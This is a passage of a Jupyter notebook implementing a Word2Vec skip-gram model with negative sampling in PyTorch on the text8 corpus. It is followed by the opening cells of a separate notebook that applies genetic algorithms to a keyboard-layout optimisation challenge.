al.\n\n---\n## Word embeddings\n\nWhen you're dealing with words in text, you end up with tens of thousands of word classes to analyze; one for each word in a vocabulary. Trying to one-hot encode these words is massively inefficient because most values in a one-hot vector will be set to zero. So, the matrix multiplication that happens in between a one-hot input vector and a first, hidden layer will result in mostly zero-valued hidden outputs.\n\nTo solve this problem and greatly increase the efficiency of our networks, we use what are called **embeddings**. Embeddings are just a fully connected layer like you've seen before. We call this layer the embedding layer and the weights are embedding weights. We skip the multiplication into the embedding layer by instead directly grabbing the hidden layer values from the weight matrix. We can do this because the multiplication of a one-hot encoded vector with a matrix returns the row of the matrix corresponding the index of the \"on\" input unit.\n\n<img src='assets/lookup_matrix.png' width=50%>\n\nInstead of doing the matrix multiplication, we use the weight matrix as a lookup table. We encode the words as integers, for example \"heart\" is encoded as 958, \"mind\" as 18094. Then to get hidden layer values for \"heart\", you just take the 958th row of the embedding matrix. This process is called an **embedding lookup** and the number of hidden units is the **embedding dimension**.\n \nThere is nothing magical going on here. The embedding lookup table is just a weight matrix. The embedding layer is just a hidden layer. The lookup is just a shortcut for the matrix multiplication. The lookup table is trained just like any weight matrix.\n\nEmbeddings aren't only used for words of course. You can use them for any model where you have a massive number of classes. A particular type of model called **Word2Vec** uses the embedding layer to find vector representations of words that contain semantic meaning.", "_____no_output_____" ], [ "---\n## Word2Vec\n\nThe Word2Vec algorithm finds much more efficient representations by finding vectors that represent the words. These vectors also contain semantic information about the words.\n\n<img src=\"assets/context_drink.png\" width=40%>\n\nWords that show up in similar **contexts**, such as \"coffee\", \"tea\", and \"water\" will have vectors near each other. Different words will be further away from one another, and relationships can be represented by distance in vector space.\n\n\nThere are two architectures for implementing Word2Vec:\n>* CBOW (Continuous Bag-Of-Words) and \n* Skip-gram\n\n<img src=\"assets/word2vec_architectures.png\" width=60%>\n\nIn this implementation, we'll be using the **skip-gram architecture** with **negative sampling** because it performs better than CBOW and trains faster with negative sampling. Here, we pass in a word and try to predict the words surrounding it in the text. In this way, we can train the network to learn representations for words that show up in similar contexts.", "_____no_output_____" ], [ "---\n## Loading Data\n\nNext, we'll ask you to load in data and place it in the `data` directory\n\n1. Load the [text8 dataset](https://s3.amazonaws.com/video.udacity-data.com/topher/2018/October/5bbe6499_text8/text8.zip); a file of cleaned up *Wikipedia article text* from Matt Mahoney. \n2. Place that data in the `data` folder in the home directory.\n3. Then you can extract it and delete the archive, zip file to save storage space.\n\nAfter following these steps, you should have one file in your data directory: `data/text8`.", "_____no_output_____" ] ], [ [ "# read in the extracted text file \nwith open('data/text8') as f:\n text = f.read()\n\n# print out the first 100 characters\nprint(text[:100])", " anarchism originated as a term of abuse first used against early working class radicals including t\n" ] ], [ [ "## Pre-processing\n\nHere I'm fixing up the text to make training easier. This comes from the `utils.py` file. The `preprocess` function does a few things:\n>* It converts any punctuation into tokens, so a period is changed to ` <PERIOD> `. In this data set, there aren't any periods, but it will help in other NLP problems. \n* It removes all words that show up five or *fewer* times in the dataset. This will greatly reduce issues due to noise in the data and improve the quality of the vector representations. \n* It returns a list of words in the text.\n\nThis may take a few seconds to run, since our text file is quite large. If you want to write your own functions for this stuff, go for it!", "_____no_output_____" ] ], [ [ "import utils\n\n# get list of words\nwords = utils.preprocess(text)\nprint(words[:30])", "['anarchism', 'originated', 'as', 'a', 'term', 'of', 'abuse', 'first', 'used', 'against', 'early', 'working', 'class', 'radicals', 'including', 'the', 'diggers', 'of', 'the', 'english', 'revolution', 'and', 'the', 'sans', 'culottes', 'of', 'the', 'french', 'revolution', 'whilst']\n" ], [ "# print some stats about this word data\nprint(\"Total words in text: {}\".format(len(words)))\nprint(\"Unique words: {}\".format(len(set(words)))) # `set` removes any duplicate words", "Total words in text: 16680599\nUnique words: 63641\n" ] ], [ [ "### Dictionaries\n\nNext, I'm creating two dictionaries to convert words to integers and back again (integers to words). This is again done with a function in the `utils.py` file. `create_lookup_tables` takes in a list of words in a text and returns two dictionaries.\n>* The integers are assigned in descending frequency order, so the most frequent word (\"the\") is given the integer 0 and the next most frequent is 1, and so on. \n\nOnce we have our dictionaries, the words are converted to integers and stored in the list `int_words`.", "_____no_output_____" ] ], [ [ "vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)\nint_words = [vocab_to_int[word] for word in words]\n\nprint(int_words[:30])", "[5233, 3080, 11, 5, 194, 1, 3133, 45, 58, 155, 127, 741, 476, 10571, 133, 0, 27349, 1, 0, 102, 854, 2, 0, 15067, 58112, 1, 0, 150, 854, 3580]\n" ] ], [ [ "## Subsampling\n\nWords that show up often such as \"the\", \"of\", and \"for\" don't provide much context to the nearby words. If we discard some of them, we can remove some of the noise from our data and in return get faster training and better representations. This process is called subsampling by Mikolov. For each word $w_i$ in the training set, we'll discard it with probability given by \n\n$$ P(w_i) = 1 - \\sqrt{\\frac{t}{f(w_i)}} $$\n\nwhere $t$ is a threshold parameter and $f(w_i)$ is the frequency of word $w_i$ in the total dataset.\n\n> Implement subsampling for the words in `int_words`. That is, go through `int_words` and discard each word given the probablility $P(w_i)$ shown above. Note that $P(w_i)$ is the probability that a word is discarded. Assign the subsampled data to `train_words`.", "_____no_output_____" ] ], [ [ "from collections import Counter\nimport random\nimport numpy as np\n\nthreshold = 1e-5\nword_counts = Counter(int_words)\n#print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear\n\ntotal_count = len(int_words)\nfreqs = {word: count/total_count for word, count in word_counts.items()}\np_drop = {word: 1 - np.sqrt(threshold/freqs[word]) for word in word_counts}\n# discard some frequent words, according to the subsampling equation\n# create a new list of words for training\ntrain_words = [word for word in int_words if random.random() < (1 - p_drop[word])]\n\nprint(train_words[:30])", "[5233, 3133, 476, 10571, 27349, 102, 15067, 58112, 3580, 10712, 371, 26, 1423, 2757, 5233, 44611, 792, 186, 5233, 8983, 4147, 6437, 4186, 5233, 344, 6753, 7573, 1774, 11064, 7088]\n" ] ], [ [ "## Making batches", "_____no_output_____" ], [ "Now that our data is in good shape, we need to get it into the proper form to pass it into our network. With the skip-gram architecture, for each word in the text, we want to define a surrounding _context_ and grab all the words in a window around that word, with size $C$. \n\nFrom [Mikolov et al.](https://arxiv.org/pdf/1301.3781.pdf): \n\n\"Since the more distant words are usually less related to the current word than those close to it, we give less weight to the distant words by sampling less from those words in our training examples... If we choose $C = 5$, for each training word we will select randomly a number $R$ in range $[ 1: C ]$, and then use $R$ words from history and $R$ words from the future of the current word as correct labels.\"\n\n> **Exercise:** Implement a function `get_target` that receives a list of words, an index, and a window size, then returns a list of words in the window around the index. Make sure to use the algorithm described above, where you chose a random number of words to from the window.\n\nSay, we have an input and we're interested in the idx=2 token, `741`: \n```\n[5233, 58, 741, 10571, 27349, 0, 15067, 58112, 3580, 58, 10712]\n```\n\nFor `R=2`, `get_target` should return a list of four values:\n```\n[5233, 58, 10571, 27349]\n```", "_____no_output_____" ] ], [ [ "def get_target(words, idx, window_size=5):\n ''' Get a list of words in a window around an index. '''\n \n R = np.random.randint(1, window_size+1)\n start = idx - R if (idx - R) > 0 else 0\n stop = idx + R\n target_words = words[start:idx] + words[idx+1:stop+1]\n \n return list(target_words)", "_____no_output_____" ], [ "# test your code!\n\n# run this cell multiple times to check for random window selection\nint_text = [i for i in range(10)]\nprint('Input: ', int_text)\nidx=5 # word index of interest\n\ntarget = get_target(int_text, idx=idx, window_size=5)\nprint('Target: ', target) # you should get some indices around the idx", "Input: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nTarget: [4, 6]\n" ] ], [ [ "### Generating Batches \n\nHere's a generator function that returns batches of input and target data for our model, using the `get_target` function from above. The idea is that it grabs `batch_size` words from a words list. Then for each of those batches, it gets the target words in a window.", "_____no_output_____" ] ], [ [ "def get_batches(words, batch_size, window_size=5):\n ''' Create a generator of word batches as a tuple (inputs, targets) '''\n \n n_batches = len(words)//batch_size\n \n # only full batches\n words = words[:n_batches*batch_size]\n \n for idx in range(0, len(words), batch_size):\n x, y = [], []\n batch = words[idx:idx+batch_size]\n for ii in range(len(batch)):\n batch_x = batch[ii]\n batch_y = get_target(batch, ii, window_size)\n y.extend(batch_y)\n x.extend([batch_x]*len(batch_y))\n yield x, y\n ", "_____no_output_____" ], [ "int_text = [i for i in range(20)]\nx,y = next(get_batches(int_text, batch_size=4, window_size=5))\n\nprint('x\\n', x)\nprint('y\\n', y)", "x\n [0, 1, 1, 1, 2, 2, 2, 3, 3, 3]\ny\n [1, 0, 2, 3, 0, 1, 3, 0, 1, 2]\n" ] ], [ [ "---\n## Validation\n\nHere, I'm creating a function that will help us observe our model as it learns. We're going to choose a few common words and few uncommon words. Then, we'll print out the closest words to them using the cosine similarity: \n\n<img src=\"assets/two_vectors.png\" width=30%>\n\n$$\n\\mathrm{similarity} = \\cos(\\theta) = \\frac{\\vec{a} \\cdot \\vec{b}}{|\\vec{a}||\\vec{b}|}\n$$\n\n\nWe can encode the validation words as vectors $\\vec{a}$ using the embedding table, then calculate the similarity with each word vector $\\vec{b}$ in the embedding table. With the similarities, we can print out the validation words and words in our embedding table semantically similar to those words. It's a nice way to check that our embedding table is grouping together words with similar semantic meanings.", "_____no_output_____" ] ], [ [ "def cosine_similarity(embedding, valid_size=16, valid_window=100, device='cpu'):\n \"\"\" Returns the cosine similarity of validation words with words in the embedding matrix.\n Here, embedding should be a PyTorch embedding module.\n \"\"\"\n \n # Here we're calculating the cosine similarity between some random words and \n # our embedding vectors. With the similarities, we can look at what words are\n # close to our random words.\n \n # sim = (a . b) / |a||b|\n \n embed_vectors = embedding.weight\n \n # magnitude of embedding vectors, |b|\n magnitudes = embed_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(0)\n \n # pick N words from our ranges (0,window) and (1000,1000+window). lower id implies more frequent \n valid_examples = np.array(random.sample(range(valid_window), valid_size//2))\n valid_examples = np.append(valid_examples,\n random.sample(range(1000,1000+valid_window), valid_size//2))\n valid_examples = torch.LongTensor(valid_examples).to(device)\n \n valid_vectors = embedding(valid_examples)\n similarities = torch.mm(valid_vectors, embed_vectors.t())/magnitudes\n \n return valid_examples, similarities", "_____no_output_____" ] ], [ [ "---\n# SkipGram model\n\nDefine and train the SkipGram model. \n> You'll need to define an [embedding layer](https://pytorch.org/docs/stable/nn.html#embedding) and a final, softmax output layer.\n\nAn Embedding layer takes in a number of inputs, importantly:\n* **num_embeddings** – the size of the dictionary of embeddings, or how many rows you'll want in the embedding weight matrix\n* **embedding_dim** – the size of each embedding vector; the embedding dimension\n\nBelow is an approximate diagram of the general structure of our network.\n<img src=\"assets/skip_gram_arch.png\" width=60%>\n\n>* The input words are passed in as batches of input word tokens. \n* This will go into a hidden layer of linear units (our embedding layer). \n* Then, finally into a softmax output layer. \n\nWe'll use the softmax layer to make a prediction about the context words by sampling, as usual.", "_____no_output_____" ], [ "---\n## Negative Sampling\n\nFor every example we give the network, we train it using the output from the softmax layer. That means for each input, we're making very small changes to millions of weights even though we only have one true example. This makes training the network very inefficient. We can approximate the loss from the softmax layer by only updating a small subset of all the weights at once. We'll update the weights for the correct example, but only a small number of incorrect, or noise, examples. This is called [\"negative sampling\"](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf). \n\nThere are two modifications we need to make. First, since we're not taking the softmax output over all the words, we're really only concerned with one output word at a time. Similar to how we use an embedding table to map the input word to the hidden layer, we can now use another embedding table to map the hidden layer to the output word. Now we have two embedding layers, one for input words and one for output words. Secondly, we use a modified loss function where we only care about the true example and a small subset of noise examples.\n\n$$\n- \\large \\log{\\sigma\\left(u_{w_O}\\hspace{0.001em}^\\top v_{w_I}\\right)} -\n\\sum_i^N \\mathbb{E}_{w_i \\sim P_n(w)}\\log{\\sigma\\left(-u_{w_i}\\hspace{0.001em}^\\top v_{w_I}\\right)}\n$$\n\nThis is a little complicated so I'll go through it bit by bit. $u_{w_O}\\hspace{0.001em}^\\top$ is the embedding vector for our \"output\" target word (transposed, that's the $^\\top$ symbol) and $v_{w_I}$ is the embedding vector for the \"input\" word. Then the first term \n\n$$\\large \\log{\\sigma\\left(u_{w_O}\\hspace{0.001em}^\\top v_{w_I}\\right)}$$\n\nsays we take the log-sigmoid of the inner product of the output word vector and the input word vector. Now the second term, let's first look at \n\n$$\\large \\sum_i^N \\mathbb{E}_{w_i \\sim P_n(w)}$$ \n\nThis means we're going to take a sum over words $w_i$ drawn from a noise distribution $w_i \\sim P_n(w)$. The noise distribution is basically our vocabulary of words that aren't in the context of our input word. In effect, we can randomly sample words from our vocabulary to get these words. $P_n(w)$ is an arbitrary probability distribution though, which means we get to decide how to weight the words that we're sampling. This could be a uniform distribution, where we sample all words with equal probability. Or it could be according to the frequency that each word shows up in our text corpus, the unigram distribution $U(w)$. The authors found the best distribution to be $U(w)^{3/4}$, empirically. \n\nFinally, in \n\n$$\\large \\log{\\sigma\\left(-u_{w_i}\\hspace{0.001em}^\\top v_{w_I}\\right)},$$ \n\nwe take the log-sigmoid of the negated inner product of a noise vector with the input vector. \n\n<img src=\"assets/neg_sampling_loss.png\" width=50%>\n\nTo give you an intuition for what we're doing here, remember that the sigmoid function returns a probability between 0 and 1. The first term in the loss pushes the probability that our network will predict the correct word $w_O$ towards 1. In the second term, since we are negating the sigmoid input, we're pushing the probabilities of the noise words towards 0.", "_____no_output_____" ] ], [ [ "import torch\nfrom torch import nn\nimport torch.optim as optim", "_____no_output_____" ], [ "class SkipGramNeg(nn.Module):\n def __init__(self, n_vocab, n_embed, noise_dist=None):\n super().__init__()\n \n self.n_vocab = n_vocab\n self.n_embed = n_embed\n self.noise_dist = noise_dist\n \n # define embedding layers for input and output words\n self.in_embed = nn.Embedding(n_vocab,n_embed)\n self.out_embed = nn.Embedding(n_vocab,n_embed)\n \n # Initialize both embedding tables with uniform distribution\n self.in_embed.weight.data.uniform_(1,-1)\n self.out_embed.weight.data.uniform_(1,-1)\n \n def forward_input(self, input_words):\n # return input vector embeddings\n input_vector = self.in_embed(input_words)\n\n return input_vector\n \n def forward_output(self, output_words):\n # return output vector embeddings\n output_vector = self.out_embed(output_words)\n\n return output_vector\n \n def forward_noise(self, batch_size, n_samples):\n \"\"\" Generate noise vectors with shape (batch_size, n_samples, n_embed)\"\"\"\n if self.noise_dist is None:\n # Sample words uniformly\n noise_dist = torch.ones(self.n_vocab)\n else:\n noise_dist = self.noise_dist\n \n # Sample words from our noise distribution\n noise_words = torch.multinomial(noise_dist,\n batch_size * n_samples,\n replacement=True)\n \n device = \"cuda\" if model.out_embed.weight.is_cuda else \"cpu\"\n noise_words = noise_words.to(device)\n \n ## TODO: get the noise embeddings\n # reshape the embeddings so that they have dims (batch_size, n_samples, n_embed)\n noise_vector = self.out_embed(noise_words)\n noise_vector = noise_vector.view(batch_size, n_samples, self.n_embed)\n\n \n return noise_vector", "_____no_output_____" ], [ "class NegativeSamplingLoss(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, input_vectors, output_vectors, noise_vectors):\n \n batch_size, embed_size = input_vectors.shape\n \n # Input vectors should be a batch of column vectors\n input_vectors = input_vectors.view(batch_size, embed_size, 1)\n \n # Output vectors should be a batch of row vectors\n output_vectors = output_vectors.view(batch_size, 1, embed_size)\n \n # bmm = batch matrix multiplication\n # correct log-sigmoid loss\n out_loss = torch.bmm(output_vectors, input_vectors).sigmoid().log()\n out_loss = out_loss.squeeze()\n \n # incorrect log-sigmoid loss\n noise_loss = torch.bmm(noise_vectors.neg(), input_vectors).sigmoid().log()\n noise_loss = noise_loss.squeeze().sum(1) # sum the losses over the sample of noise vectors\n\n # negate and sum correct and noisy log-sigmoid losses\n # return average batch loss\n return -(out_loss + noise_loss).mean()", "_____no_output_____" ] ], [ [ "### Training\n\nBelow is our training loop, and I recommend that you train on GPU, if available.", "_____no_output_____" ] ], [ [ "device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Get our noise distribution\n# Using word frequencies calculated earlier in the notebook\nword_freqs = np.array(sorted(freqs.values(), reverse=True))\nunigram_dist = word_freqs/word_freqs.sum()\nnoise_dist = torch.from_numpy(unigram_dist**(0.75)/np.sum(unigram_dist**(0.75)))\n\n# instantiating the model\nembedding_dim = 300\nmodel = SkipGramNeg(len(vocab_to_int), embedding_dim, noise_dist=noise_dist).to(device)\n\n# using the loss that we defined\ncriterion = NegativeSamplingLoss() \noptimizer = optim.Adam(model.parameters(), lr=0.003)\n\nprint_every = 1500\nsteps = 0\nepochs = 3\n\n# train for some number of epochs\nfor e in range(epochs):\n \n # get our input, target batches\n for input_words, target_words in get_batches(train_words, 512):\n steps += 1\n inputs, targets = torch.LongTensor(input_words), torch.LongTensor(target_words)\n inputs, targets = inputs.to(device), targets.to(device)\n \n # input, outpt, and noise vectors\n input_vectors = model.forward_input(inputs)\n output_vectors = model.forward_output(targets)\n noise_vectors = model.forward_noise(inputs.shape[0], 5)\n\n # negative sampling loss\n loss = criterion(input_vectors, output_vectors, noise_vectors)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # loss stats\n if steps % print_every == 0:\n print(\"Epoch: {}/{}\".format(e+1, epochs))\n print(\"Loss: \", loss.item()) # avg batch loss at this point in training\n valid_examples, valid_similarities = cosine_similarity(model.in_embed, device=device)\n _, closest_idxs = valid_similarities.topk(6)\n\n valid_examples, closest_idxs = valid_examples.to('cpu'), closest_idxs.to('cpu')\n for ii, valid_idx in enumerate(valid_examples):\n closest_words = [int_to_vocab[idx.item()] for idx in closest_idxs[ii]][1:]\n print(int_to_vocab[valid_idx.item()] + \" | \" + ', '.join(closest_words))\n print(\"...\\n\")", "Epoch: 1/3\nLoss: 6.543435573577881\nbut | angel, democratic, some, eagles, unrest\nafter | upgrades, the, yau, sam, commissioning\none | the, and, six, british, four\nyears | forum, afro, stole, guardian, called\nnot | oldest, arizona, vdash, freshwater, of\nsuch | painter, regardless, creature, uc, jews\nwhen | lukoff, japan, translations, angels, casinos\nbetween | the, us, sayed, annexation, fighters\nalternative | storing, faure, melon, rock, anti\negypt | stabilize, bulb, staphylococcus, casablanca, olive\ngrand | brattain, player, vocation, platinum, arexx\ninstance | improvement, autumnal, belgian, visigoths, lio\nsmith | paying, thousands, decimus, involved, parchamis\nconstruction | evil, sarcastically, antiphon, tomatoes, masami\nunits | phrase, tetra, exploitation, funds, homosexuals\ndiscovered | conducting, irene, railcar, tap, akademie\n...\n\nEpoch: 1/3\nLoss: 4.900622367858887\nthere | of, with, to, a, unitarian\nfor | of, the, a, that, and\nhas | zero, a, with, the, is\nwith | to, in, of, zero, a\nwill | or, hexadecimal, one, examples, analogs\nthree | the, and, one, two, zero\nthis | the, in, that, and, to\nabout | zero, seven, two, he, and\nmainly | a, carboxylate, futures, parenthesis, marginal\nbible | conversion, banjos, taut, assamese, refute\nshown | bolivia, cryptography, valve, zur, likewise\nfile | deporting, vince, intrinsically, fifty, elucidate\nknow | boron, bosnians, wasted, traverse, for\ninstance | and, riddler, improvement, question, malaise\nfrac | beethoven, elric, inflicting, of, umayyad\nliberal | agrarian, november, central, moods, stages\n...\n\nEpoch: 1/3\nLoss: 4.091379165649414\nbut | the, is, this, that, be\ninto | it, of, with, be, to\ni | to, his, one, s, it\non | a, to, and, the, for\ncalled | of, in, for, is, an\nworld | nine, four, eight, have, one\nwhile | are, to, or, that, painted\nmay | of, in, the, to, a\ncost | pliocene, benelux, tenji, staffed, make\nmarriage | instead, nonmetallic, of, angelo, the\nmean | more, capone, outs, originator, heizei\nreport | country, subhas, cauchy, inscrutable, partnered\narticles | of, all, lookout, ozzy, fickle\naccepted | shofar, ear, word, popularly, quantized\npope | urbanisation, create, sitting, soil, lender\nunits | deutschland, tetra, exploitation, womanhood, disputing\n...\n\nEpoch: 1/3\nLoss: 3.7220635414123535\nother | a, by, of, to, are\nwar | of, france, united, seven, army\nd | seven, american, two, eight, born\nuse | be, usually, will, can, is\nwho | his, by, in, he, as\ntime | to, and, at, all, not\nif | can, is, be, which, are\nby | the, of, in, to, as\nfrac | x, quad, formula, left, e\ntaking | carlsberg, faith, movie, times, utterances\nprimarily | has, puzzle, vec, frontiers, ought\nscale | sides, satin, water, other, objected\nquite | here, arabic, how, described, aromatics\nanimals | telescope, poisoned, a, eia, while\ndefense | pediment, military, demonstrators, othello, codeword\nwoman | sauces, birth, byrne, who, oracle\n...\n\nEpoch: 1/3\nLoss: 3.4148216247558594\non | and, in, s, two, of\nbeen | as, by, his, that, and\nfor | the, in, and, of, an\nthere | are, as, their, and, of\nknown | in, as, work, an, by\nsome | their, it, for, these, considered\nwhere | the, as, a, time, on\nwhich | this, of, to, the, as\narticles | grapple, superb, university, traditionally, science\ngrand | nine, again, american, player, september\ntest | pressure, helps, bat, parameter, cruisers\nhttp | www, links, org, information, eight\nwriters | life, science, births, winning, saint\noperating | windows, available, software, versions, programmers\naccepted | contrary, sin, churches, not, held\nliberal | political, president, government, democratic, party\n...\n\nEpoch: 1/3\nLoss: 3.107332706451416\nas | a, of, and, to, the\nseven | three, nine, one, eight, five\nto | the, as, in, and, an\nthis | example, for, can, a, if\nmost | its, and, it, to, with\nstates | united, nations, federal, constitution, state\nwhen | to, an, was, the, would\nor | are, can, form, used, and\nversions | software, operating, released, computer, based\ninstitute | university, national, nobel, richard, school\ndefense | military, rights, forces, against, army\nroad | east, railway, player, home, sports\nadditional | using, require, number, programs, cost\nexistence | within, nature, meaning, nor, beliefs\nhold | not, cause, god, divine, that\napplied | words, word, forms, particular, theory\n...\n\nEpoch: 2/3\nLoss: 2.721822738647461\npeople | s, age, also, children, among\nth | century, eastern, roman, west, east\nduring | early, after, war, later, against\nbut | have, or, which, usually, not\nthe | of, in, and, to, on\nare | is, a, or, different, form\nwere | he, never, from, entered, to\nuse | are, for, or, into, like\npre | middle, less, article, also, latin\ninstitute | studies, research, press, articles, engineering\ntest | a, using, nuclear, weapons, played\nsquare | area, city, river, metres, valley\ncentre | city, cities, town, railway, station\nprofessional | baseball, team, leagues, association, sports\nhold | that, nor, way, believe, them\nwoman | love, her, she, my, him\n...\n\nEpoch: 2/3\nLoss: 2.7671380043029785\nseven | six, five, one, two, nine\nas | which, of, also, the, for\nto | the, they, with, not, that\neight | five, six, one, nine, four\nmost | some, in, and, a, generally\nsystem | programs, process, use, method, systems\nwhen | with, the, off, to, fourth\nand | of, the, in, with, have\nbehind | at, record, the, on, ground\nexperience | theories, mind, whether, spiritual, ideas\ndefense | armed, defence, military, government, personnel\nbrother | married, son, wife, his, him\nshows | a, showing, the, since, often\negypt | ethiopia, syria, bc, ancient, empire\nmagazine | newspaper, com, comedy, science, book\ntest | control, involves, testing, project, trained\n...\n\nEpoch: 2/3\nLoss: 2.6753008365631104\nwith | a, to, an, by, the\nsix | one, four, five, nine, seven\nzero | one, five, nine, two, four\nover | zero, estimated, two, a, total\nafter | killed, had, returned, was, she\ntime | to, when, this, event, moment\nfirst | was, one, title, actress, sir\nmore | even, have, many, being, very\nexperience | knowledge, brain, theories, social, much\nreport | program, reports, environmental, intelligence, development\nuniverse | earth, quantum, mechanics, dark, gravity\naward | awards, oscar, nominations, academy, film\ngrand | west, italy, adopted, south, holland\nnotes | s, classical, external, one, instrument\nprofessional | association, teams, davis, regularly, baseball\ngovernor | republican, england, constitution, scotland, minister\n...\n\nEpoch: 2/3\nLoss: 2.803065061569214\nduring | war, soviet, after, army, ended\nthey | that, while, these, almost, and\nworld | organized, has, national, history, as\nnine | one, zero, six, eight, two\nmay | to, a, however, take, must\nthere | if, to, is, a, directly\nwho | he, mother, him, i, she\nare | called, can, different, is, which\nmathematics | theory, mathematical, mathematicians, computation, geometry\nolder | age, low, versus, household, below\nsmith | james, george, robert, john, oxford\ndr | robert, directed, nine, actor, d\nderived | word, other, written, words, meaning\naccount | thought, theories, how, these, life\nfreedom | rights, freedoms, criticized, faire, moral\ntaking | joined, s, but, when, prevent\n...\n\nEpoch: 2/3\nLoss: 2.720899820327759\nworld | the, in, of, four, york\nwould | him, again, had, did, lost\namerican | actor, actress, player, singer, canadian\nother | often, from, those, to, in\nunited | states, u, nations, canada, member\nall | only, that, the, being, or\nif | will, can, must, get, that\nsee | external, links, list, official, history\nsomething | thing, we, says, why, sense\nshown | pre, suggests, without, behave, evidence\negypt | syria, egyptian, arab, israel, islamic\npowers | power, of, following, resolution, regime\npope | emperor, xii, catholic, iv, bishop\nconsists | are, is, the, area, located\npolice | forces, armed, army, killed, killing\nbible | testament, text, hebrew, prophets, tanakh\n...\n\nEpoch: 2/3\nLoss: 2.5932250022888184\nit | a, to, on, will, and\nthree | five, one, two, six, nine\nmay | two, five, three, not, this\nhe | him, his, friend, when, was\nstate | missouri, located, lies, north, southeastern\ns | and, john, nine, six, eight\nthis | if, instead, can, to, or\nthey | them, themselves, in, their, have\nbbc | television, radio, day, broadcast, listing\nstage | show, featured, films, best, film\nrunning | run, unix, processor, pc, on\nliberal | liberals, party, democrat, liberalism, political\nversions | mac, windows, version, software, operating\nrise | period, political, by, considerably, into\njoseph | john, thomas, politician, theologian, composer\nscale | scales, ratios, key, octave, tuning\n...\n\n" ] ], [ [ "## Visualizing the word vectors\n\nBelow we'll use T-SNE to visualize how our high-dimensional word vectors cluster together. T-SNE is used to project these vectors into two dimensions while preserving local stucture. Check out [this post from Christopher Olah](http://colah.github.io/posts/2014-10-Visualizing-MNIST/) to learn more about T-SNE and other ways to visualize high-dimensional data.", "_____no_output_____" ] ], [ [ "%matplotlib inline\n%config InlineBackend.figure_format = 'retina'\n\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE", "_____no_output_____" ], [ "# getting embeddings from the embedding layer of our model, by name\nembeddings = model.in_embed.weight.to('cpu').data.numpy()", "_____no_output_____" ], [ "viz_words = 380\ntsne = TSNE()\nembed_tsne = tsne.fit_transform(embeddings[:viz_words, :])", "_____no_output_____" ], [ "fig, ax = plt.subplots(figsize=(16, 16))\nfor idx in range(viz_words):\n plt.scatter(*embed_tsne[idx, :], color='steelblue')\n plt.annotate(int_to_vocab[idx], (embed_tsne[idx, 0], embed_tsne[idx, 1]), alpha=0.7)", "_____no_output_____" ], [ "#", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1c353f120f2255c4ac2156dea7ce36ae4a34fd
66,569
ipynb
Jupyter Notebook
notebooks/1.0-jf-en-test.ipynb
joaopfonseca/dssgsummit2020-challenge
04dd7896fd0df4349291ad4d4919bbe7cff9f830
[ "MIT" ]
null
null
null
notebooks/1.0-jf-en-test.ipynb
joaopfonseca/dssgsummit2020-challenge
04dd7896fd0df4349291ad4d4919bbe7cff9f830
[ "MIT" ]
1
2021-09-09T09:00:36.000Z
2021-09-09T09:00:36.000Z
notebooks/1.0-jf-en-test.ipynb
joaopfonseca/dssgsummit2020-challenge
04dd7896fd0df4349291ad4d4919bbe7cff9f830
[ "MIT" ]
null
null
null
46.780745
111
0.601496
[ [ [ "import os\nfrom os.path import join, pardir\nfrom collections import Counter\nfrom copy import deepcopy\nimport numpy as np\nfrom deap import base, creator, algorithms, tools\nfrom dssg_challenge import compute_cost, check_keyboard\n\nRNG_SEED = 0\nDATA_DSSG = join(pardir, 'data', 'processed')\n\nrng = np.random.RandomState(RNG_SEED)", "_____no_output_____" ], [ "os.listdir(DATA_DSSG)", "_____no_output_____" ], [ "# get keys\nwith open(join(DATA_DSSG, 'en-keys.txt'), 'r') as file:\n keys = file.read()\n\n# get corpus example\nwith open(join(DATA_DSSG, 'en-corpus.txt'), 'r') as file:\n corpus = file.read()\n\nkeys = ''.join(keys.split('\\n'))\ncorpus = ''.join(corpus.split(keys)).split('\\n')[0]", "_____no_output_____" ] ], [ [ "Some keys are used to signal special characters. Namely,\n\n- The ENTER key is represented as 0.\n- The shift key for capitalization is represented as ^.\n- The backspace key is represented as <.\n- All the remaining characters not found in the valid keys are encoded as #.\n- Empty keys will contain the character _.\n", "_____no_output_____" ] ], [ [ "len(keys), keys", "_____no_output_____" ] ], [ [ "## The most basic approaches", "_____no_output_____" ] ], [ [ "Counter(corpus).most_common()[:10]", "_____no_output_____" ], [ "baseline = ''.join([i[0] for i in Counter(corpus).most_common()])\nbaseline = baseline + ''.join([i for i in keys if i not in baseline]) + ' T'\nbaseline", "_____no_output_____" ], [ "shuffled = list(baseline)\nrng.shuffle(shuffled)\n\nanthony = 'EINOA TCGVDURL<^SWH_Z__XJQFPBMY,#.0K?'\n\ncheck_keyboard(baseline, keys)\ncheck_keyboard(keys+' T', keys)\ncheck_keyboard(shuffled, keys)\ncheck_keyboard(''.join([i if i!='_' else ' ' for i in anthony]), keys)\n\nprint('Shuffled cost:\\t\\t\\t', compute_cost(''.join(shuffled), corpus))\nprint('Original keys cost:\\t\\t', compute_cost(keys+' ', corpus))\nprint('Baseline cost:\\t\\t\\t', compute_cost(baseline, corpus))\nprint('Anthony Carbajal\\'s solution:\\t', compute_cost(''.join([i for i in anthony if i!='_']), corpus))", "Shuffled cost:\t\t\t 233432.54787591402\nOriginal keys cost:\t\t 215629.56595268694\nBaseline cost:\t\t\t 170178.49650661062\nAnthony Carbajal's solution:\t 158733.94185884856\n" ] ], [ [ "## First attempt with GA", "_____no_output_____" ] ], [ [ "keys_list = list(keys)\n\ndef evaluate(individual):\n \"\"\"\n Computes the cost for each individual.\n \"\"\"\n try:\n check_keyboard(individual, 